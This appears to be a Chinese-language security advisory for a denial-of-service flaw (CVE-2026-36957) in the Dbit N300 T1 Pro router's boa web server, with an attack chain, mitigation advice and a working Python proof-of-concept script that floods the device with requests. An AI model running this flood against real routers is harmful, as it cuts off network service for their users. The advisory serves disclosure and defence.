CVE-2026-36957 CVSS 7.5 高危

CVE-2026-36957 Dbit路由器拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36957

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router

漏洞概述

Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router V1.0.0版本中的boa web服务器URI处理程序存在拒绝服务漏洞。攻击者可以通过向不存在的URI发送大量HTTP GET请求，耗尽系统的关键资源（如文件描述符和内存缓冲区）。这会导致内核死锁或系统挂起，从而使Web管理门户和所有路由功能失效。

技术细节

该漏洞源于Dbit N300 T1 Pro路由器V1.0.0版本中集成的boa web服务器对URI处理的缺陷。当攻击者向设备发起针对不存在路径的高并发HTTP GET请求时，服务器会尝试处理这些请求并分配系统资源（如文件描述符和内存缓冲区）。由于缺乏有效的速率限制和资源管理机制，这种攻击能够迅速耗尽系统的可用资源。随着资源的枯竭，系统进程将无法获取必要的文件描述符或内存，最终导致内核死锁或整个系统挂起。此时，设备不仅Web管理界面无法访问，其核心的路由转发功能也会完全瘫痪，必须通过重启才能恢复服务。

攻击链分析

STEP 1

侦查与发现

攻击者扫描网络，发现目标Dbit N300 T1 Pro路由器及其Web管理接口。

STEP 2

资源耗尽攻击

攻击者编写脚本，向路由器发起大量针对不存在URI的HTTP GET请求。

STEP 3

系统资源枯竭

路由器的boa服务器因处理大量无效请求，耗尽文件描述符和内存缓冲区。

STEP 4

服务拒绝

系统发生内核死锁或挂起，Web管理界面不可用，网络路由功能中断，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading
import random

# Target configuration
target_ip = "192.168.0.1" # Replace with the router's IP address
base_url = f"http://{target_ip}/"
num_threads = 50

def send_flood():
    """Function to send requests to non-existent URIs"""
    while True:
        # Generate a random non-existent URI path
        random_uri = base_url + str(random.randint(100000, 999999))
        try:
            # Send GET request without waiting for response
            requests.get(random_uri, timeout=0.5)
        except Exception:
            # Ignore connection errors or timeouts to keep flooding
            pass

if __name__ == "__main__":
    print(f"Starting DoS flood against {target_ip}...")
    
    # Create multiple threads to simulate high-volume traffic
    threads = []
    for _ in range(num_threads):
        t = threading.Thread(target=send_flood)
        t.daemon = True
        t.start()
        threads.append(t)
    
    # Keep the main script running
    for t in threads:
        t.join()

影响范围

Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router V1.0.0

防御指南

临时缓解措施

如果无法立即升级固件，建议通过ACL（访问控制列表）严格限制Web管理界面的访问权限，仅允许特定管理IP进行连接，并监控路由器的系统资源使用情况，一旦发现异常流量立即切断外部连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36957
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36957
3 Details https://www.cvedetails.com/cve/CVE-2026-36957/
4 VulDB https://vuldb.com/cve/CVE-2026-36957
5 Link http://dbit.com
6 Link https://github.com/kirubel-cve/CVE-2026-36957
7 Link https://github.com/kirubel-cve/CVE-2026-36957

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表